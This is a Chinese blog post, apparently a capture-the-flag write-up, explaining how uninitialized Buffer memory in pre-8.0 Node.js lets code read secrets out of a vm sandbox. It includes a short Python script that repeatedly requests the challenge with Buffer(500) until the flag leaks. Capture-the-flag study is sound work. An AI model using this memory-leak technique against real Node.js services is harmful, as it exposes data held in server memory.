Node.js8.0沙箱逃逸问题

最新推荐文章于 2023-10-01 22:27:53 发布
最新推荐文章于 2023-10-01 22:27:53 发布
阅读量392 收藏
点赞数
文章标签: node.js 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53099802/article/details/125101520
版权

看不是很懂先记录下来NodeJS沙箱逃逸分析 - 安全客,安全资讯平台

在较早一点的 node 版本中 (8.0 之前),当 Buffer 的构造函
数传入数字时, 会得到与数字长度一致的一个 Buffer,并且这
个 Buffer 是未清零的。8.0 之后的版本可以通过另一个函数
Buffer.allocUnsafe(size) 来获得未清空的内存。

实例:攻防世界leaking

进入页面,代码审计

flag以变量存在沙箱中。buffer可以直接读取沙箱内容

所以可以构造:

注意文件编码的声明,不然可能显示不出来。

# encoding=utf-8
import requests
import time
url = 'http://111.200.241.244:49358?data=Buffer(500)'  (为自己网页的URL)
response = ''
while 'flag' not in response:
    req = requests.get(url)
    response = req.text
    print(req.status_code)
    time.sleep(0.1)
    if 'flag{' in response:
        print(response)
        break

在kali中运行

成功获取flag

flag{4nother_h34rtbleed_in_n0dejs}

 

托物言志
关注
Noder-简单的基于Docker的NodeJS沙箱
08-10
Noder -简单的,基于Docker的NodeJS沙箱。用于测试代码并包含一个编辑器
浅谈Node.js 沙箱环境
10-18
### Node.js 沙箱环境概述 在Node.js中,沙箱环境主要用于隔离代码执行上下文,确保在特定环境中运行的代码不会干扰到全局或外部作用域中的其他代码。这在许多场景下都非常有用,例如在开发插件系统、安全评估用户...
Node.js沙箱逃逸
shawdow_bug的博客
09-02 2019
什么是沙箱(sandbox) 在计算机安全性方面,沙箱(沙盒、sanbox)是分离运行程序的安全机制,提供一个隔离环境以运行程序。通常情况下,在沙箱环境下运行的程序访问计算机资源会受到限制或者禁止,资源包括内存、网络访问、主机系统等等。 沙箱通常用于执行不受信任的程序或代码,例如用户输入、第三方模块等等。其目的为了减少或者避免软件漏洞对计算机造成破坏的风险。 沙箱技术的实现 & node.js 沙箱技术按照设定的安全策略,限制不可信程序对系统资源的使用来实现,那么就要在访问系统资源之前将程序的系统调
Nodejs沙箱逃逸
最新发布
weixin_51525416的博客
10-01 1842
Nodejs沙箱逃逸
node.js--vm沙箱逃逸初探
m0_62422842的博客
01-04 2161
前几天遇到一个考察vm沙箱逃逸的题目,由于这个点是第一次听说,所以就花时间了解了解什么是沙箱逃逸。此篇文章是对于自己初学vm沙箱逃逸的学习记录,若记录知识有误,欢迎师傅们指正。就只针对于node.js而言,沙箱和docker容器其实是差不多的,都是将程序与程序之间,程序与主机之间互相分隔开,但是沙箱是为了隔离有害程序的,避免影响到主机环境。为什么node.js语言要引入沙箱,这就要说说js语言中的作用域(也叫上下文)。------->输出undefined-------->输出100。
Node.js-Node.js全局键盘和鼠标侦听器
08-10
Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行环境,它允许开发者在服务器端使用 JavaScript 进行编程。在标题“Node.js-Node.js全局键盘和鼠标侦听器”中,提及的是如何在 Node.js 环境下实现对键盘和鼠标...
Node.js安全沙箱环境设置与动态脚本限制实践
Node.js应用中,设置安全沙箱环境是一项关键任务,尤其是在允许用户自定义逻辑的场景下,如Microsoft Office VBA、游戏内的lua脚本或浏览器扩展。为了保护核心应用免受恶意代码的侵害并确保数据安全,开发者需要...
require.Sandbox:require.js 的沙箱模块
06-23
require.js 的沙箱模块 require.Sandbox 是一个沙盒模块,集成到,可用于安全加载模块。 这个想法是将它们包装到一个沙箱中,以确保错误不会使整个应用程序崩溃,但可以以编程方式处理。 沙盒错误 修补错误函数 ...
react-sandbox:react 和 node.js 沙箱
06-16
1. **使用Node.js环境**:Node.js是基于Chrome V8引擎的JavaScript运行时,用于构建服务器端和网络应用。在React沙箱中,Node.js提供了后端服务支持,你可以试验服务器渲染(SSR)、API接口创建等技术。 2. **探索...
nodejs-沙箱
03-04
参考: : Nodejs沙箱 安装 打开cmd并输入'node -v'来检查您的计算机是否安装了nodejs。 如果不是,请在这里下载并安装Node js。 运行节点程序 转到您的项目目录,并在cmd中写入节点{ur_js_fileName} 创建服务器并侦听请求 const http = require('http'); // Create a server const server = http.createServer((req, res) => { console.log("Request is made!"); }); //listen for request server.listen(3000, 'localhost', ()=>{ console.log("Server is created!"); }); 返回回复 const http = requi
nodejs-sandbox:对我和nodejs来说也是一个沙箱
02-14
nodejs-沙箱
NodeJS沙箱
weixin_30834019的博客
01-28 133
NodeJS沙箱 转载于:https://www.cnblogs.com/motadou/archive/2013/01/28/2879960.html
[HITCON 2016]Leaking-nodejsVM沙箱逃逸
cjdgg的博客
08-19 714
[HITCON 2016]Leaking 最近想学下nodejs相关的题目,所以去buu上又找了一道来做 进入题目后如上图所示,直接给出了源代码,老样子,拿出之前收藏的nodejs相关安全问题来对比着看看,我发现这里用了VM沙箱,那最有可能考的就是VM逃逸了 emem由于之前没做过,说实话,光看这个完全不知道该怎么做,还是老实找个大佬的WP来看看吧 那我们先来分析下代码,下面这段代码是整道题的核心 /* Orange is so kind so he put the flag here. But
Node.js 沙箱环境
ALLEN'Blog
01-11 476
vm提供了一种隔离的方式来执行不可信代码,但是并不是非常彻底,针对不可信代码最好的执行方式还是“物理隔离”,比如docker容器。
node.js 沙盒逃逸分析
凹凸实验室
10-30 1075
作者: 凹凸曼 - nobo 背景 日常开发需求中有时候为了追求灵活性或降低开发难度,会在业务代码里直接使用 eval/Function/vm 等功能,其中 eval/Function 算是动态执行 JS,但无法屏蔽当前执行环境的上下文,但 node.js 里提供了 vm 模块,相当于一个虚拟机,可以让你在执行代码时候隔离当前的执行环境,避免被恶意代码攻击。 vm 基本介绍 vm 模块可在 V8 虚拟机上下文中编译和运行代码,虚拟机上下文可自行配置,利用该特性做到沙盒的效果。例如: const vm = .
Nodejs沙箱绕过
weixin_54347738的博客
08-03 358
A:因为primitive types,数字、字符串、布尔等这些都是primitive types,他们的传递其实传递的是值而不是引用,所以在沙盒内虽然你也是使用的m,但是这个m和外部那个m已经不是一个m了,所以也是无法利用的,但是,如果修改下context:{m: [], n: {}, x: /regexp/},这样m、n、x就都可以利用了。创建完两个空文件夹之后,跟之前操作一样,在键盘按下【win+R】键,输入cmd,然后回车,打开命令行界面,输入下面命令,如图。
利用内存破坏实现Python沙盒逃逸
weixin_33805992的博客
11-01 285
几周之前心痒难耐的我参与了一段时间的漏洞赏金计划。业余这个漏洞赏金游戏最艰巨的任务就是挑选一个能够获得最高回报的程序。不久我就找到一个存在于Python沙盒中执行的用户提交代码的Web应用程序的bug,这看起来很有趣,所以我决定继续研究它。 进过一段时间的敲打之后,我发现了在Python层实现沙盒逃逸的方法。报告归档了,漏洞几天内及时被修复,得到了一笔...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值